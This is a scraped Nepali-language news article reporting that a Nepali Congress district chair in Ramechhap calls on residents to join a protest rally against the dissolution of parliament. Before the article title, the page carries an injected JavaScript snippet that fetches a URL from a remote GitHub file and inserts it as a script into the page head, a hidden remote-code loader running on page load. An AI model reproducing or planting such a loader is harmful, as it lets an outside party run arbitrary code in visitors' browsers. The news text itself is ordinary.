;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); भोली हुने संसद् बिघटनको बिरोध कार्यक्रम सहभागी हुन सभापति न्यौपानेको आह्वन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • भोली हुने संसद् बिघटनको बिरोध कार्यक्रम सहभागी हुन सभापति न्यौपानेको आह्वन
ट्रेन्डिङ

भोली हुने संसद् बिघटनको बिरोध कार्यक्रम सहभागी हुन सभापति न्यौपानेको आह्वन

फागुन ०२
नेपाली कांग्रेस रामेछापका सभापति लवश्री न्यौपानेले भोली (सोमबार) गर्नलागेको विरोद्ध कार्यक्रममा भब्य सहभागिता जनाउनको लागि आह्वन गरेका छन् । कांग्रेसले सोमबार केन्द्रीय परिपत्र अनुसार सबै जिल्लामा प्रर्दशन गर्दै छ ।

सोही बिरोध कार्यक्रमा सहभागिभै संसद विघटनको बिरोध गर्न सबै रामेछापबासीमा आह्वन गरेका छन् । बिरोध कार्यक्रमलाई सम्बोधन गर्न भोली कांग्रेसका केन्द्रीय सदस्य शिब हुमगाई जिल्ला आउने उनले जानकारी दिए । बिहान ठीक ११ बजे मन्थलीको बिपी चोकबाट र्यालीसहित प्रर्दशनको कार्यक्रम हुने उनले बताए ।

यसअघि पनि कांग्रेसले पटक-पटक बिरोध कार्यक्रम जिल्लामा गर्दै आएको छ ।

फेसबुक प्रतिक्रियाहरु